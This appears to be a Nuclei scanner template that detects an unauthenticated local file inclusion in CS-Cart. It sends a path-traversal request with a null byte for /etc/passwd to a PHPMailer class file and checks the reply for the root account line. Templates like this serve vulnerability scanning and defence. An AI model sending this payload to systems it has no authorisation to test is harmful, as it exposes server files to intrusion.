id: cs-cart-unauthenticated-lfi

info:
  name: CS-Cart unauthenticated LFI
  author: 0x_Akoko
  severity: high
  description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content.
  reference: https://cxsecurity.com/issue/WLB-2020100100
  tags: cscart,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200